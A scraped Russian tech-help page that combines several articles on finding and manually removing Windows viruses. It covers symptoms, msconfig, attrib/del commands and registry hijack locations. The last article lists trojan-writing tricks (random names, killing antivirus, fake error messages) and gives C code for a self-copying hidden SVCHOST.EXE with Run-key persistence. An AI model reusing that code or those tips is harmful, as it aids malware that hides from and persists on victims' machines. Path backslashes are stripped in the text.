Bazaprogram.ru

Новости из мира ПК
0 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

В каких папках могут находиться вирусы

Все методы обнаружения вирусов на компьютере

Интернет является неотъемлемой часть жизни современного человека. С другой стороны, он становится источником опасных вирусов, некоторые из которых следует удалять на начальных этапах «инфицирования». Но как выявить вирусы в компьютере? Какие самые распространенные симптомы заражения? Об этом и не только – в моей очередной статье.

Конечно же, подхватить «заразу» можно и без подключения к интернету. К примеру, если Вы вставляете в USB порт «вредоносную» флешку. Об этом я писал в статье как вирус блокирует USB порт. Или обмениваетесь файлами внутри рабочей сети.

Но есть множество способов обнаружить вирус даже без специального ПО. Сейчас я расскажу о них, но сначала мы рассмотрим основные признаки «заболевания».

Как узнать о заражении?

Хакеры, которые разрабатывают вредоносные скрипты, довольно хитрые особи, которые умело маскируют угрозу под безопасную программу. В любом случае, не нужно паниковать и видеть во всем опасность. Необходимо внимательно проанализировать ситуацию.

Начинать волноваться можно, когда:

  • Во время запуска Windows появляется окно блокировки, которое содержит текст наподобие «Вы нарушили такие-то статьи криминального кодекса и дело будет передано в суд. Чтобы избежать этого, отправьте СМС / пополните счет и т.д.». Помните, не так давно я рассказывал об этом вирусе?
  • Вы не можете зайти на сайты социальных сетей или поисковых систем. Опять же, появляется окно с предложением заплатить денег. Подробно об этом я писал в тематической статье.
  • Система не слишком быстро реагирует на Ваши команды, медленно открываются приложения, процедура копирования / перемещения файлов длится слишком долго.
  • Загрузка ОС занимает больше времени, чем раньше. Стоит учесть, что данный признак актуален, если Вы не инсталлировали сторонних приложений, которые могли прописаться в автозагрузке.
  • Во время запуска ПК самостоятельно открывается браузер, его начальная страница изменена, постоянно расходуется сетевой трафик (хотя Вы ничего не делаете).
  • От Вашего имени начинает рассылаться спам (через e-mail и аккаунты соцсетей).
  • Перестает работать двойной щелчок мыши при открытии файлов (при условии, что манипулятор рабочий).
  • Начинают бесследно пропадать документы, установленные приложения и прочие файлы.
  • ПО не запускается или выполняется с ошибками, которых ранее не было.

Если имеют место быть какие-либо из перечисленных признаков, есть вероятность заражения. Но не стоит паниковать, ведь я всегда готов подсказать, как удалить вирусы.

Способы обнаружения

Я не буду рассказывать, как выявить вредоносный код (файл) с помощью антивирусного софта. Уверен, с этим справится каждый. Достаточно запустить полную проверку с помощью встроенного / стороннего ПО (Kaspersky, Dr.Web Cure It!).

Хочу подробнее рассказать о случае, когда система работает без антивируса (или от последнего нет никакой пользы).

Проверяем диспетчер процессов

Это первое, что приходит мне в голову, когда возникают подозрения. Зачастую, троян маскируется под безопасный процесс и делает свое темное дело. Как обнаружить?

  • Открываем перечень запущенных служб и приложений с помощью комбинации « Ctrl — Shift — Esc ».
  • Следует сразу же исключить системные.
  • Внимательно просмотрите Ваш перечень. «Шпионы» и прочие вредоносные программы могут скрываться под такими же названиями с разницей в одну-две буквы. Вот, присмотритесь:

  • Если список содержит названия, состоящие из бессмысленного набора букв и цифр, стоит задуматься:

  • Если в чём-то сомневаетесь, то лучше «забейте» название процесса в поисковой системе, чтобы узнать о нём побольше.

Одним из таких является вирус Recycler я рассказывал о как можно от него избавиться.

Анализируем автозагрузку

Большинство вирусов запускаются вместе с системой, блокируя её или активируя свои вредные функции. Хотите узнать, как «вычислить» таких злодеев?

  • Вызываем окно «Выполнить» с помощью комбинации Win + R.
  • Вводим команду «msconfig» для открытия конфигуратора Microsoft.

  • На экране появится нечто подобное (только с другими элементами списка «Автозагрузка»):

  • Опять же, смотрите на названия, проверяйте их через Google / Яндекс. Если уверены, что самостоятельно не добавляли элемент в автозапуск, и он не связан с установленным приложением, то смело удаляйте его.
  • Перезапустите ПК и повторите предыдущие шаги. Если удаленный пункт снова активен, значит это однозначно вирус. Потребуется более доскональное сканирования и лечение.

Вот мы и разобрались с простейшими способами, которые позволят совершенно бесплатно выявить угрозу на начальном этапе. Такой подход максимально эффективен для предотвращения дальнейшего распространения «заразы». Больше материала можно найти в разделе лечение вирусов, там описаны самые распространенные вирусы и методы борьбы с ними.

Если статья оказалась полезной, почему бы не поблагодарить автора (это я о себе) репостами в социальных сетях. Буду очень признателен. И не забывайте, что при любой ситуации можете обращаться ко мне через форму комментирования.

В каких папках могут находиться вирусы

Вирус заблокировал экран

Места в компьютере много и вроде спрятаться вирусу есть где, но все таки у них есть свои определенные так сказать излюбленные места. Так где же их искать?

Конечно мест где могут располагаться вирусы много, но основных мест несколько:

  1. Папка C:WINDOWSsystem32 (или system).
    Посмотрите запись от сканирования системы утилитой Cureit.

    Троян ворующий пароли, расположился в папке system32, и в его названии CPLDAPU вроде ничего не обычного нет, хотя это просто набор букв. Название может быть различным, например таким 15h18d с расширением EXE. Главное, что бы вирус ничем особенным не выделялся.
  2. Для того чтобы вирусу установиться, он должен куда-то скачаться. Здесь другие места. Любимое место в этом случае папка Documents and Settings/Application Data. Посмотрите на путь закачки троянов выцепленных Касперским


    C:UsersИмяAppDataLocalYandexYandexBrowserUser Data.
    Папка AppData(Application Data) скрыта и посмотреть её можно настроив доступ к скрытым файлам и папкам или через какую-нибудь программу, например “Total Commander”. Далее папка Local (ваш компьютер) и браузер которым пользуетесь.
    Чаще всего вирус прячется именно в папке AppData(Application Data), далее папка System Volume Information (при этом не обязательно на диске С может быть и диск D), и папка Temp.
  3. Иногда вирусы скачиваются в архивированном виде (контейнеры) и распаковываться в другие места. Например очень распространенный случай при заражении вирусами, при установке порно-баннеров на операционную систему. Вирус в этом случае грузится в папку Application Data, распаковывается в папку Temp и устанавливается в папку system32. Заменяя запись реестра в ветке HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon параметр Shell (reg_sz) вместо значения «explorer.exe» на свой.
Читать еще:  Перестала скачиваться музыка из вконтакте

Просматривая папки и файлы вряд ли можно обнаружить вирус. Программисты, пишущие код вируса знают, где будет прятаться вирус и под это место маскируют название вируса, например в папке System Volume Information чаще всего встречаются вирусы (контейнеры) с названием типа А100045.

Для удаления троянов, червей делайте проверку компьютера антивирусом, для удаления вирусов- баннеров необходимо воспользоваться загрузочным диском типа LiveCD и встроенными антивирусами или вручную (если есть опыт) удалить вирус.

Иногда случается целая трагедия, вирус вносит изменения в файл hosts, после чего не удается зайти на такие популярные сайты как Одноклассники и ВКонтакте. Решение данной проблемы описано в статье «Не могу зайти в Одноклассники«.

Вирусы хранятся в тех папках, файлы которых они заразили. Как правило, это системные папки: любая системная папка. Предугадать заранее, куда вирус отправится, нельзя.

Если вы имеете ввиду вирусы, которые помещены в карантин антивирусом, то обычно у антивирусов для этого специальная папка в корневой антивируса, либо во временных папках. Например, ESET хранит вирусы в папке Карантин по пути: С ==> Имя пользователя ==> App Data ==> Local ==> Eset.

Температура процессора

Типы вредоносных программ

Как удалить вирус самостоятельно

Здесь мы покажем вам, как можно самостоятельно обнаружить и затем удалить файлы, способные нанести вред вашему компьютеру, или вирусы самостоятельно (вручную) без использования каких-либо антивирусных программ.

Это несложно . Давайте начнём!

Как удалить вирус самостоятельно

Действовать необходимо на правах администратора.

Для начала надо открыть командную строку. Для этого нажмите сочетание клавиш WINDOWS + R и в появившемся окне в строке введите cmd и нажмите ОК .

Команда cmd в командной строке

Либо, нажав кнопку Пуск в нижнем левом углу экрана монитора, в строке поиска начните набирать « командная строка », а затем по найденному результату кликните правой кнопкой мышки и выберите « Запуск от имени администратора ».

Вызов командной строки через поиск

Запуск командной строки от имени администратора

Кратко о том, какие цели у наших будущих действий:

С помощью команды attrib нужно найти такие файлы, которые не должны находиться среди системных файлов и потому могут быть подозрительными.

Вообще, в C: / drive не должно содержаться никаких .exe или .inf файлов. И в папке C:WindowsSystem32 также не должны содержаться какие-либо, кроме системных, скрытые или только для чтения файлы с атрибутами i, e S H R .

Итак, начнём ручной поиск подозрительных, файлов, то есть вероятных вирусов, самостоятельно, без использования специальных программ.

Откройте командную строку и вставьте cmd . Запустите этот файл от имени администратора.

Открываем cmd

Прописываем в строке cd/ для доступа к диску. Затем вводим команду attrib . После каждой команды не забываем нажимать ENTER:

Команда attrib в командной строке

Как видим из последнего рисунка, файлов с расширениями .exe или .inf не обнаружено.

А вот пример с обнаруженными подозрительными файлами:

Вирусы в системе Windows

Диск С не содержит никаких файлов .еxе и .inf, пока вы не загрузите эти файлы вручную сами . Если вы найдёте какой-либо файл, подобный тем, которые мы нашли, и он отобразит S H R, тогда это может быть вирус.

Здесь обнаружились 2 таких файла:

autorun.inf

sscv.exe

Эти файлы имеют расширения .еxе и . inf и имеют атрибуты S H R . Значит, эти файлы могут быть вирусами .

Теперь наберите attrib -s -h -г -а -i filename.extension. Или в нашем примере это:

attrib —s —h —г —а -i autorun.inf

Эта команда изменит их свойства, сделав из них обычные файлы. Дальше их можно будет удалить.

Для удаления этих файлов введите del filename.extension или в нашем случае:

del autorun.inf

То же самое надо проделать со вторым файлом:

Удаление вирусов вручную

Теперь перейдём к папке System32.

Продолжим далее поиск, вписывая следующие команды внизу:

Впишите cd win* и нажмите ENTER.

Снова введите s ystem32. Нажмите ENTER.

Затем впишите команду attrib . Нажмите ENTER.

Ищем вирусы в папке System32

Появился вот такой длинный список:

Ищем вирусы в папке System32

Снова вводим внизу команду attrib , не забывая нажать потом ENTER :

Самостоятельное удаление вирусов с компьютера | Интернет-профи

И находим вот такие файлы:

Читать еще:  Какой антивирус ставить

Подозрительные файлы в папке Windows

Подозрительные файлы в папке Windows

При перемещении вверх-вниз экран перемещается очень быстро, поэтому когда мелькнёт что-то новое, приостановитесь и вернитесь назад‚ чтобы проверить каждый файл, не пропустив ни одного.

Подозрительные файлы в папке Windows

Выписываем себе все найденные S H R файлы:

  1. atr.inf
  2. dcr.exe
  3. desktop.ini
  4. idsev.exe

Выполните команду attrib 3 или 4 раза, чтобы убедиться, что вы проверили всё.

Ну, вот. Мы самостоятельно нашли целых 4 вредоносных файла! Теперь нам нужно удалить эти 4 вируса.

Для этого дальше в командной строке вписываем и каждый раз нажимаем ENTER следующее:

C:WindowsSystem32>attrib -s -h -r -a -i atr.inf

C:WindowsSystem32>del atr.inf

C:WindowsSystem32>attrib -s -h -r -a -i dcr.exe

C:WindowsSystem32>del dcr.exe

C:WindowsSystem32>attrih -s -h -r -a -i desktop.ini

C:WindowsSystem32>del desktop.ini

C:WindowsSystem32>attrib -s -h -r -a -i idsev.exe

C:WindowsSystem32>del idsev.exe

Удаляем вирусы с компьютера самостоятельно

Аналогичную операцию надо провести с другими папками, вложенными в каталог Windows.

Нужно просканировать ещё несколько таких каталогов, как Appdata и Temp. Используйте команду attrib, как показано в этой статье, и удалите все файлы с атрибутами S H R, которые не имеют отношения к системным файлам и могут заразить ваш компьютер.

Где прячутся вирусы и как пользоваться командой msconfig в Windows

При заражении компьютера вирусы поступают таким образом, чтобы при загрузке операционной системы они тоже загружались, либо загружалась их необходимая часть. Для этого они вносят изменения в реестр Windows.

В зависимости от «продвинутости» создателя вируса, это может быть реализовано по-разному. Рассмотрим самые распространенные случаи:

1. В автозагрузке операционной системы

Проверить это можно с помощью команды msconfig, запущенной через меню Пуск — Выполнить

В столбце «Команда» не должно быть подозрительных элементов, например C:Program Filesnovirus.exe

Команда msconfig позволяет только отображать и отключать ненужные программы из автозагрузки, для полного удаления следов необходимо почистить соответствующие ветки реестра (посмотреть в столбце «Расположение»).

Как альтернативe команде msconfig можно использовать программу XPTweaker (скачайте с официального сайта).

В разделе «Система» перейти на закладку «Загрузка системы», прокрутить скроллом немного вниз до заголовка «Автозагрузка». Также просмотреть внимательно список загружаемых вместе с операционной системой приложений и при необходимости удалить ненужные. Программа удаляет информацию сразу и в реестре Windows.

Внимание! Для того, чтобы случайно не удалить важный системный процесс Windows — уточните предварительно у компьютерных гуру или найдите ответ через поисковую систему Яндекс или Гугл о неизвестных вам загружаемых приложений, например RTHDCPL.EXE

Данный способ загрузки вируса — самый элементарный. Он легко обнаруживается, и вирус удаляется. Так действовали вирусы 5−10-летней давности.

2. Вместо проводника

Это очень распространенный случай при заражении вирусами, особо часто он был замечен при установке пopнo-баннеров на операционную систему. Вирус в этом случае грузится вместо проводника Windows, заменив запись в реестре:

В ветке HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

Параметр Shell (reg_sz) вместо значения «explorer.exe» заменяется вирусом на свой, например C:WINDOWSsystem32h6d8dn.exe или подобную хрень.

В ветке HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

Параметр Shell (reg_sz) вместо значения «explorer.exe» заменяется вирусом на свой, например C:WINDOWSsystem32h6d8dn.exe или подобную хрень.

Исправить это с наименьшими потерями можно, загрузившись с загрузочного CD-ROM или USB, проверить систему с помощью утилиты от Доктора Веба — launcher.exe. Но только в том случае, если в базе вирусов Доктора Веба есть информация об этом вирусе.

Более действенный и быстрый способ — загрузившись с загрузочного диска запустить программу редактирования реестра с возможностью подключения к удаленному реестру. Для этого идеально подходит сборка ERD.

Нужно посмотреть запись в реестре по адресу HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon, исправить «хрень» у записи параметра Shell (reg_sz) на «explorer.exe» и запомнить путь нахождения и имя файла вируса, чтобы удалить его вручную.

3. Вместе с userinit.exe или uihost.exe

В этом случае рабочий стол может отображаться и компьютер может вроде бы нормально работать, но могут быть заблокированы некоторые функции браузера по умолчанию или всех браузеров, невозможность отрыть сайты антивирусных программ и др.

Userinit.exe — программа, которая открывает Рабочий стол и активирует сетевые функции после запуска Windows. Находится он по адресу C:WINDOWSsystem32userinit.exe. Размер оригинального файла составляет 26,0 КБ (26 624 байт), на диске: 28,0 КБ (28 672 байт).

Некоторые вирусы могут изменить запись в реестре у трех параметров (у всех или только некоторых) Userinit, UIHost и Shell, расположенных по адресу:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

Оригинальные параметры записи в реестре должны быть следующими:

Вирус может прописать себя например так:

В данном примере файл gertinw.exe — это 100% вирус! Обязательно запомнить путь к файлу вируса и удалить его!

После удаления нужно заменить файлы userinit.exe, logonui.exe (находятся в C:WINDOWSsystem32) и explorer.exe (находится в C:WINDOWS) на аналогичные файлы из дистрибутива виндовса (найдете поиском), т.к. остатки червя могут находиться в файлах ключей.

Где находятся вирусы

После нужно проверить файл hosts (открыть любым тестовым редактором) на наличие запретов на известные сайты антивирусных программ: C:windowssystem32driversetchosts. Удалить все после строки 127.0.0.1 localhost

Также запрет на загрузку сайтов может быть прописан в реестре по следующим адресам:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersPersistentRoutes

HKEY_LOCAL_MACHINESYSTEMControlSet <номера 001 или 002>ServicesTcpipParameters PersistentRoutes

Удалить их содержимое полностью кроме строки «По умолчанию» с неприсвоенным значением.

Читать еще:  Помогите убрать вирус

Автор текста: Сергей «Остров»

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

В каких папках могут находиться вирусы

Привет всем. В этой статье я поведаю вам приемы для программирования червей и троянов. Чтобы быть подкованным и без помощи антивирусы расправиться с любым вирусом, Вам стоит это прочесть.
Долго распинаться не буду, и перейду сразу к делу:

Для начала приведу список мест в реестре, где они могут поселиться на автозагрузку.

HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRun
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionPoliciesExplorerRun
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRunServicesOnce
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRunServices
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRunOnceSetup
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRunOnceEx
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NT CurrentVersionWinlogonUserinit
HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorerRun
HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRunServicesOnce
HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRunServices
HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRunOnceSetup
HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRunOnceEx
HKEY_CURRENT_USERSoftwareMicrosoftWindows NT CurrentVersionWindowsload

Некоторые из таких мест весьма интересны, потому что на них не обращает внимания msconfig и утилиты для реестра.
Так что вирусы смело записываются туда на автозагрузку.

HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorerRun

При написании вирусов используются различные приемы для сокрытия программ от глаз пользователя:

  1. Можно произвольно выбирать имена — прописывать себя с ними в автозагрузку и копировать в винду. Имена можно выбирать как из списка, так и случайно.
  2. Можно при каждой перезагрузке менять местоположение — перемещаясь по системным каталогам и меняя имя.
  3. Также можно хранить в коде своей программы такую же программу, но с другого компилятора. Чтоб Касперкси сразу все не припалил.
  4. При заражении диска или компьютера необходимо учитывать психологию пользователя. Отвлечь его приманить именем программы, иконкой. Вывести липовое системное сообщение.
  5. Работая с окнами можно закрывать авнтивирусы.
  6. При копировании в память нельзя выделять себе большой приоритет.
  7. Из системного реестра можно извлечь много полезной информации. (Ниже приведу интересные параметры реестра).
  8. Отредактировав файл hosts можно без труда запретить пользователю посещать какие-либо домены. Он даже ничего не заподозрит.
  9. Некоторые вирусы хранят в себе коды вирусов на различных языках программирования и в нужный момент извлекают и запускают их.

Таким образом, данная DLL будет запускаться как дочерний процесс Explorer.exe и её не будет в менеджере процессов.

Привожу список параметров реестра разрытых вручную, для удобства вы можете покопаться в книжках по реестру и найти там для себя много нового.

Имена и типы протоколов по умолчанию.

Некоторые вирусы заменяют Стартовую страницу броузеров или поисковую систему по умолчанию.

[HKEY_LOCAL_MACHINESOFTWARE Microsoft WindowsCurrentVersionURLDefaultPrefix]
@=»http://»

[HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionURLPrefixes]
«ftp»=»ftp://»
«gopher»=»gopher://»
«home»=»http://»
«mosaic»=»http://»
«www»=»http://»

HKEY_CURRENT_USERSoftware Microsoft Internet ExplorerMain
Start Page
Search Page

Изменяют параметры рабочего стола.

HKEY_CURRENT_USERControl PanelDesktop
ConvertedWallpaper
scrnsave.exe
Wallpaper
OriginalWallpaper

Тут хранятся имена и названия системных пользовательских папок, типа: Мои документы, Мои рисунки, Рабочий стол. Их некоторые вирусы могут менять.

HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionExplorerShell Folders
Common Administrative Tools
Common AppData
Common Desktop
Common Documents
Common Favorites
Common Programs
Common Start Menu
Common Startup
Common Templates
CommonMusic
CommonPictures
CommonVideo
Personal

Подменяют информацию о процессоре

HKEY_LOCAL_MACHINEHARDWAREDESCRIPTION SystemCentralProcessor
ProcessorNameString

Здесь хранятся системные цвета (окон, текста, кнопок и, т, д)

HKEY_CURRENT_USERControl PanelColors
ActiveBorder
ActiveTitle
AppWorkSpace
Background
ButtonAlternateFace
ButtonDkShadow
ButtonFace
ButtonHilight
ButtonLight
ButtonShadow
ButtonText
GradientActiveTitle
GradientInactiveTitle
GrayText
Hilight
HilightText
HotTrackingColor
InactiveBorder
InactiveTitle
InactiveTitleText
InfoText
InfoWindow
Menu
MenuBar
MenuHilight
MenuText
Scrollbar
TitleText
Window
WindowFrame
WindowText

Как они добавляют ключи в реестр. Эта WinAPI функция добавления параметров в системный реестр (Работает под любой Windows.)

//——
char windir[512];
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE , «Software\ Microsoft\Windows\CurrentVersion\ Run»,0,KEY_WRITE,&hKey); //Открываем
RegSetValueEx(hKey,»FILE.EXE»,0,REG_SZ,(BYTE *) windir,256); //Пишем
RegCloseKey(hKey); //Закрываем
//——

В менеджере процессов постоянно запущены файлы SVCHOST.EXE.
Так вот этот файл лежит в windowssystem32 и вирус сохраняет свое тело под её именем. Поймать такого черта, можно только увидев в менеджере процессов, кто запустил процесс. Все процессы SVCHOST запускаются от имени системы (SYSTEM). Если такой файл запущен от имени пользователя, стоит задуматься.

Вот обрывок того самого кода:

char myname[1024],windir[1024];
HKEY hKey;

SetErrorMode(SEM_NOGPFAULTERRORBOX); //Вырубаем сообщения об ошибках
PeekMessage(NULL, NULL, NULL, NULL, NULL);

GetModuleFileName(hInstance,myname,sizeof(myname)); //Получаем путь к себе и папку винды
GetWindowsDirectory(windir,sizeof(windir));

strcat(windir,»\SVCHOST.EXE»);
CopyFile(myname,windir,FALSE); //Копируемся
SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);

//———————Startup———————————
RegOpenKeyEx(HKEY_LOCAL_MACHINE, «Software\Microsoft \Windows\CurrentVersion\Run» ,0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,»SVCHOST.EXE»,0,REG_SZ,(BYTE *) windir,256); //Пишемся в реестр
RegCloseKey(hKey);
//————————————————————

if(strcmp(windir,myname)) //Проверяем если программа не в папке windows то выйти (Мы ведь уже скопировались ;)!
<
MessageBox(0,»Необходимый файл динамической библиотеки msbjk.dll не найден.»,»Error», MB_OK | MB_DEFBUTTON1 | MB_ICONEXCLAMATION | MB_DEFAULT_DESKTOP_ONLY);
return 0;
>
//——-
for(;;) //Это бесконечный цикл
<
RegOpenKeyEx(HKEY_LOCAL_MACHINE,»Software\Microsoft \Windows\CurrentVersion\Run» , 0,KEY_WRITE,&hKey);
RegSetValueEx(hKey, «SVCHOST.EXE»,0, REG_SZ,(BYTE *)windir,256);
RegCloseKey(hKey);
// Тут может быть любой код вашей программы
EnumProcessesOther();// Эта функция будет описана в следующ
ей статье (Она закрывт все антивирусы)
Sleep(30000); //Задержка на 30 секунд
>

В папке windows есть файл без расширения hosts. Если в него вписать код:

0.0.0.0 www.microsoft.com

То пользователь не сможет зайти ни на один из этих сайтов, каким бы браузером и через какие прокси он бы не старался. Так что иногда туда заглядывайте.

Сорри, но полностью все и изложить не смог, так как это уже будет не статья, а книжка 😉

Статья написана исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Комментарии

А если мне сложно понять все это, касперского и OSSP хватит?

Ссылка на основную публикацию
Adblock
detector
Комментарий от юра [ 3 января, 2009, 13:30 ]